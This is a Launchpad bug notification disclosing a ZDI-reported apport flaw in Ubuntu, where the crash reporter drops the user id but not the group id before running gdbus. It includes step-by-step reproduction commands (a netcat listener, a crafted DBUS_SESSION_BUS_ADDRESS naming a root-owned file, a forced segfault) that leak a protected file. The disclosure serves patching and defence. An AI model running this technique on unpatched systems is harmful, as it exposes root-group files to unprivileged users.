| Thread Previous • Date Previous • Date Next • Thread Next |
** Changed in: apport (Ubuntu Eoan)
Status: Confirmed => Won't Fix
--
You received this bug notification because you are a member of नेपाली
भाषा समायोजकहरुको समूह, which is subscribed to Xenial.
Matching subscriptions: Ubuntu 16.04 Bugs
https://bugs.launchpad.net/bugs/1885633
Title:
[ZDI-CAN-11233]: apport Unnecessary Privileges Information Disclosure
Vulnerability
Status in apport package in Ubuntu:
Fix Released
Status in apport source package in Xenial:
Fix Released
Status in apport source package in Bionic:
Fix Released
Status in apport source package in Eoan:
Won't Fix
Status in apport source package in Focal:
Fix Released
Bug description:
-- VULNERABILITY DETAILS ------------------------
* Version tested:18.04.4 LTS amd64 server
* Installer file:ubuntu-18.04.4-live-server-amd64.iso
* Platform tested:-
---
### Analysis
Apport which is crash reporter in Ubuntu will execute gdbus to check if pid is in a closing user session. Before executing the binary, it drop privilege to crashed process's uid. But it doesn't drop group id, so it can be used to leak file which is owned by root group.
It leads to anyone can read the file which can only be read by root group, but the file size must be 16bytes.
reproduce step
```
ubuntu@ubuntu:/tmp$ echo -ne "SECURESECRETHERE" > securefile
ubuntu@ubuntu:/tmp$ sudo chown root:root securefile
ubuntu@ubuntu:/tmp$ sudo chmod 440 securefile
ubuntu@ubuntu:/tmp$ su - zdi
Password:
zdi@ubuntu:~$ id
uid=1001(zdi) gid=1001(zdi) groups=1001(zdi)
zdi@ubuntu:~$ cd /tmp/
zdi@ubuntu:/tmp$ ls -al securefile
-r--r----- 1 root root 16 Jun 16 04:33 securefile
zdi@ubuntu:/tmp$ cat securefile
cat: securefile: Permission denied
zdi@ubuntu:/tmp$ nc -lp 8888 &
[1] 2034
zdi@ubuntu:/tmp$ DBUS_SESSION_BUS_ADDRESS=nonce-tcp:host=localhost,port=8888,family=ipv4,noncefile=/tmp/securefile sleep 1000 &
[2] 2036
zdi@ubuntu:/tmp$ kill -11 2036
zdi@ubuntu:/tmp$ SECURESECRETHEREAUTH
zdi@ubuntu:/tmp$
```
~~~C++
orig_uid = os.geteuid()
os.setresuid(-1, os.getuid(), -1) <-- did not set gid
try:
gdbus = subprocess.Popen(['/usr/bin/gdbus', 'call', '-e', '-d',
'org.gnome.SessionManager', '-o', '/org/gnome/SessionManager', '-m',
'org.gnome.SessionManager.IsSessionRunning'], stdout=subprocess.PIPE,
stderr=subprocess.PIPE, env={'DBUS_SESSION_BUS_ADDRESS': dbus_addr})
(out, err) = gdbus.communicate()
if err:
error_log('gdbus call error: ' + err.decode('UTF-8'))
except OSError as e:
error_log('gdbus call failed, cannot determine running session: ' + str(e))
return False
finally:
os.setresuid(-1, orig_uid, -1)
~~~
-- CREDIT ---------------------------------------
This vulnerability was discovered by:
Ryota Shiga(@Ga_ryo_) of Flatt Security working with Trend Micro Zero Day Initiative
To manage notifications about this bug go to:
https://bugs.launchpad.net/ubuntu/+source/apport/+bug/1885633/+subscriptions
| Thread Previous • Date Previous • Date Next • Thread Next |
